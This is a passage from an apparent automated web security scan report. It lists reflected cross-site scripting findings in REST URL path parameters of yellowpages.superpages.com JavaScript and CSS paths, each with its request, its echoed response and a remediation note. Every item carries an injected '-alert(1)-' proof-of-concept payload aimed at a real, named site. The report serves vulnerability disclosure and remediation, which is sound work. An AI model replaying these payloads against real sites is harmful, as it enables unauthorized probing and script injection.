Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:45 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/typography.cssc512b"-alert(1)-"208ebd640d3?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.594. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1603f"-alert(1)-"7b40bab0d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common1603f&quot;-alert(1)-&quot;7b40bab0d58/js/alertcommon.js
Server: Unspecified
Set-Cookie: JSESSIONID=31374E21CBB6E62331151FDD9D287B6E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:30 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.595. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20813"-alert(1)-"42f38a119fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js20813"-alert(1)-"42f38a119fb/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js20813&quot;-alert(1)-&quot;42f38a119fb/alertcommon.js
Server: Unspecified
Set-Cookie: JSESSIONID=1964063886F42A385D9BF560E5991661; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:37 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js20813"-alert(1)-"42f38a119fb/alertcommon.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.596. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c615e"-alert(1)-"fd5addf1395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/alertcommon.jsc615e&quot;-alert(1)-&quot;fd5addf1395
Server: Unspecified
Set-Cookie: JSESSIONID=C42F1F43179B33DCF485D91863AA0026; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:44 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.597. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae19"-alert(1)-"9957299e054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonbae19"-alert(1)-"9957299e054/js/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonbae19&quot;-alert(1)-&quot;9957299e054/js/browser_check.js
Server: Unspecified
Set-Cookie: JSESSIONID=E09C44F1BBBAA213F4E42EF428D3F357; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:27 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonbae19"-alert(1)-"9957299e054/js/browser_check.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.598. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67314"-alert(1)-"4d0383f1bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js67314&quot;-alert(1)-&quot;4d0383f1bcf/browser_check.js
Server: Unspecified
Set-Cookie: JSESSIONID=36F4629CEBB28C41CD456D4BA38FDE53; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:44 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.599. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4823"-alert(1)-"6b96276b57d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/browser_check.jsb4823&quot;-alert(1)-&quot;6b96276b57d
Server: Unspecified
Set-Cookie: JSESSIONID=3F77784525870BE1A8C596BB0EA60651; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:51 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.600. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa65f"-alert(1)-"34ef4e6041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonaa65f&quot;-alert(1)-&quot;34ef4e6041c/js/iepopup.js
Server: Unspecified
Set-Cookie: JSESSIONID=2134AC985409415C2A045A7FF6023BCE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:41 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.601. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7547e"-alert(1)-"e77ecaba831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js7547e"-alert(1)-"e77ecaba831/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js7547e&quot;-alert(1)-&quot;e77ecaba831/iepopup.js
Server: Unspecified
Set-Cookie: JSESSIONID=BA40BC8F6A7DD188B47568ADA942F69A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js7547e"-alert(1)-"e77ecaba831/iepopup.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.602. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57121"-alert(1)-"a019059d18b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/iepopup.js57121"-alert(1)-"a019059d18b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/iepopup.js57121&quot;-alert(1)-&quot;a019059d18b
Server: Unspecified
Set-Cookie: JSESSIONID=5FEE5F212D4C070AC3E37397025C1DA1; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:20 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/iepopup.js57121"-alert(1)-"a019059d18b?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.603. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12235"-alert(1)-"2aa4880554e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common12235&quot;-alert(1)-&quot;2aa4880554e/js/jquery-1.4.2.min.js
Server: Unspecified
Set-Cookie: JSESSIONID=199509FE8D2800AF9160EA7047F290DD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:44 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.604. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e853"-alert(1)-"4df34621227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js6e853&quot;-alert(1)-&quot;4df34621227/jquery-1.4.2.min.js
Server: Unspecified
Set-Cookie: JSESSIONID=3139A329C5301E9058E04DFF871BCCF1; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.605. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c940"-alert(1)-"8d600cbb5e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery-1.4.2.min.js4c940&quot;-alert(1)-&quot;8d600cbb5e6
Server: Unspecified
Set-Cookie: JSESSIONID=1640D122FA5011C752860F98D405C757; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:08 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.606. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4138"-alert(1)-"d392b5225e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonf4138&quot;-alert(1)-&quot;d392b5225e3/js/jquery-plugins.js
Server: Unspecified
Set-Cookie: JSESSIONID=9572D1720D04456BA7DF5D05EB1798D8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:40 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.607. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc582"-alert(1)-"51b3ea3bf60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdc582&quot;-alert(1)-&quot;51b3ea3bf60/jquery-plugins.js
Server: Unspecified
Set-Cookie: JSESSIONID=09CE7FF4251840525CF01CD53A9C9A17; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:59 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.608. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
